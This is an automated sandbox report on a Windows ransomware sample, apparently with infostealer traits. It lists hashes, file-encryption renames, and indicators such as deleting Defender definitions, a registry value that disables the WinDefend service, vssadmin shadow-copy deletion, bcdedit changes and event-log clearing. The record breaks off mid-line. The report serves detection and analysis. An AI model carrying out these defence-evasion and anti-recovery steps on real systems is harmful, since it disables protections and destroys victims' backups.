Resubmissions
12-01-2022 19:42
220112-ye478adgd4 1012-01-2022 19:26
220112-x5vwssdgej 1012-01-2022 16:57
220112-vgqwtsdce7 10Analysis
-
max time kernel
125s -
max time network
120s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 19:26
Static task
static1
Behavioral task
behavioral1
Sample
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe
Resource
win10-en-20211208
General
-
Target
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe
-
Size
3.3MB
-
MD5
257cd3ef7ac49a4b7942f7b61ca10b6c
-
SHA1
a0043163d33e25ba2a62c5061fd641c44807b492
-
SHA256
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5
-
SHA512
bb9dded0fa261da418b3b0b14cfa72e4688f378bfe5814a0df45a01eb6d4b2ada6f56fb3151b75e6c8118dffd80e3e79c084befbcdfeeef851926e6faa4158db
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2136 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2068 bcdedit.exe 2092 bcdedit.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exedescription ioc process File renamed C:\Users\Admin\Pictures\FormatSplit.crw => C:\Users\Admin\Pictures\FormatSplit.crw.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_y0Yyj3mi68I0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Users\Admin\Pictures\FormatSplit.crw.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_y0Yyj3mi68I0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File renamed C:\Users\Admin\Pictures\SwitchConvert.raw => C:\Users\Admin\Pictures\SwitchConvert.raw.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_4snpvR4DHM40.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Users\Admin\Pictures\SwitchConvert.raw.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_4snpvR4DHM40.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\utilityfunctions.js.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_oDYgokwXKRs0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Cocos.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_e9DIb8GS6mY0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR2B.GIF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Ptdu1DjGK0I0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_AV1sgaRVLgU0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_85BqdgNwcUM0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\fr-FR\SpiderSolitaire.exe.mui.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Hxp_u4Uchfs0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_6roHS_sox800.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_vtRKSrvHjXQ0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00783_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_EFWCpoxO4iU0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01252_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_tQqfkvrePL80.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_wdm3Ep4ptIs0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.SG.XML.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_GvQ0SsrzfJI0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_eho_I_i47cU0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_sa48YXAIosI0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\OLAPPTR.FAE.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_G0PldnZoY0Y0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_qhfExihT4hU0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\BRANDING.XML.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_N8dEHKcY-Ws0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182898.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_fJGb6TlF9IY0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImageMask.bmp.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Pj_Bfth3m9s0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_BHNoPgrFGc00.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_WKR3I7UKnP80.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_seh_Z9SG0GQ0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\en-US\FreeCell.exe.mui.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_JErNanpgThY0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00200_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_q3PBHC8iRRE0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_TspvXMIeL0k0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_jdqOFlOLKhI0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_3ug6sBrpVq80.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Pp4FDHDNdrg0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_bKJWOndWIio0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CharSetTable.chr.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_FQsEQwq7PM00.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_yfPew5aUoko0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_LesaNY3VuF00.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_s0uXSGsb1D80.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\picturePuzzle.js 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\alertIcon.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_TFvAXdvS_Q00.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Toronto.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_vI4r7Zg1oiU0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\calendar.html 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\settings.html 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00092_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_OXg66vZUSuU0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUB6INTL.REST.IDX_DLL.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_gNaPZfBCfHo0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BZCARD11.POC.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_M6Kmrxzdb6U0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01183_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_EM3vPo_5ZdM0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_mGlnpXA3AFE0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03257_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Hgssa9KQ1dk0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow.css.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_kch-zAhd4Q80.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_UYnxZ1AXw980.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01139_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_2fGDcDFf7SA0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Simferopol.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_KD925aoY2A40.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_kXLCjsgLIvk0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0237759.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_dFWidkz26rc0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00478_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Lplx1klSQfM0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00260_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_VUMB6x4UCfo0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_K0Fy9a9lbxk0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Z20_EkdHsAQ0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1588 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exepid process 2168 powershell.exe 2264 powershell.exe 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 240 wevtutil.exe Token: SeBackupPrivilege 240 wevtutil.exe Token: SeSecurityPrivilege 864 wevtutil.exe Token: SeBackupPrivilege 864 wevtutil.exe Token: SeSecurityPrivilege 1908 wevtutil.exe Token: SeBackupPrivilege 1908 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1108 wmic.exe Token: SeSecurityPrivilege 1108 wmic.exe Token: SeTakeOwnershipPrivilege 1108 wmic.exe Token: SeLoadDriverPrivilege 1108 wmic.exe Token: SeSystemProfilePrivilege 1108 wmic.exe Token: SeSystemtimePrivilege 1108 wmic.exe Token: SeProfSingleProcessPrivilege 1108 wmic.exe Token: SeIncBasePriorityPrivilege 1108 wmic.exe Token: SeCreatePagefilePrivilege 1108 wmic.exe Token: SeBackupPrivilege 1108 wmic.exe Token: SeRestorePrivilege 1108 wmic.exe Token: SeShutdownPrivilege 1108 wmic.exe Token: SeDebugPrivilege 1108 wmic.exe Token: SeSystemEnvironmentPrivilege 1108 wmic.exe Token: SeRemoteShutdownPrivilege 1108 wmic.exe Token: SeUndockPrivilege 1108 wmic.exe Token: SeManageVolumePrivilege 1108 wmic.exe Token: 33 1108 wmic.exe Token: 34 1108 wmic.exe Token: 35 1108 wmic.exe Token: SeIncreaseQuotaPrivilege 584 wmic.exe Token: SeSecurityPrivilege 584 wmic.exe Token: SeTakeOwnershipPrivilege 584 wmic.exe Token: SeLoadDriverPrivilege 584 wmic.exe Token: SeSystemProfilePrivilege 584 wmic.exe Token: SeSystemtimePrivilege 584 wmic.exe Token: SeProfSingleProcessPrivilege 584 wmic.exe Token: SeIncBasePriorityPrivilege 584 wmic.exe Token: SeCreatePagefilePrivilege 584 wmic.exe Token: SeBackupPrivilege 584 wmic.exe Token: SeRestorePrivilege 584 wmic.exe Token: SeShutdownPrivilege 584 wmic.exe Token: SeDebugPrivilege 584 wmic.exe Token: SeSystemEnvironmentPrivilege 584 wmic.exe Token: SeRemoteShutdownPrivilege 584 wmic.exe Token: SeUndockPrivilege 584 wmic.exe Token: SeManageVolumePrivilege 584 wmic.exe Token: 33 584 wmic.exe Token: 34 584 wmic.exe Token: 35 584 wmic.exe Token: SeIncreaseQuotaPrivilege 584 wmic.exe Token: SeSecurityPrivilege 584 wmic.exe Token: SeTakeOwnershipPrivilege 584 wmic.exe Token: SeLoadDriverPrivilege 584 wmic.exe Token: SeSystemProfilePrivilege 584 wmic.exe Token: SeSystemtimePrivilege 584 wmic.exe Token: SeProfSingleProcessPrivilege 584 wmic.exe Token: SeIncBasePriorityPrivilege 584 wmic.exe Token: SeCreatePagefilePrivilege 584 wmic.exe Token: SeBackupPrivilege 584 wmic.exe Token: SeRestorePrivilege 584 wmic.exe Token: SeShutdownPrivilege 584 wmic.exe Token: SeDebugPrivilege 584 wmic.exe Token: SeSystemEnvironmentPrivilege 584 wmic.exe Token: SeRemoteShutdownPrivilege 584 wmic.exe Token: SeUndockPrivilege 584 wmic.exe Token: SeManageVolumePrivilege 584 wmic.exe Token: 33 584 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1572 wrote to memory of 1796 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1796 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1796 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1796 wrote to memory of 576 1796 net.exe net1.exe PID 1796 wrote to memory of 576 1796 net.exe net1.exe PID 1796 wrote to memory of 576 1796 net.exe net1.exe PID 1572 wrote to memory of 368 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 368 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 368 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 368 wrote to memory of 864 368 net.exe net1.exe PID 368 wrote to memory of 864 368 net.exe net1.exe PID 368 wrote to memory of 864 368 net.exe net1.exe PID 1572 wrote to memory of 1408 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1408 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1408 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1408 wrote to memory of 1584 1408 net.exe net1.exe PID 1408 wrote to memory of 1584 1408 net.exe net1.exe PID 1408 wrote to memory of 1584 1408 net.exe net1.exe PID 1572 wrote to memory of 1388 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1388 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1388 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1388 wrote to memory of 1752 1388 net.exe net1.exe PID 1388 wrote to memory of 1752 1388 net.exe net1.exe PID 1388 wrote to memory of 1752 1388 net.exe net1.exe PID 1572 wrote to memory of 1560 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1560 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1560 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1560 wrote to memory of 1448 1560 net.exe net1.exe PID 1560 wrote to memory of 1448 1560 net.exe net1.exe PID 1560 wrote to memory of 1448 1560 net.exe net1.exe PID 1572 wrote to memory of 1836 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1836 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1836 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1836 wrote to memory of 1820 1836 net.exe net1.exe PID 1836 wrote to memory of 1820 1836 net.exe net1.exe PID 1836 wrote to memory of 1820 1836 net.exe net1.exe PID 1572 wrote to memory of 1052 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to 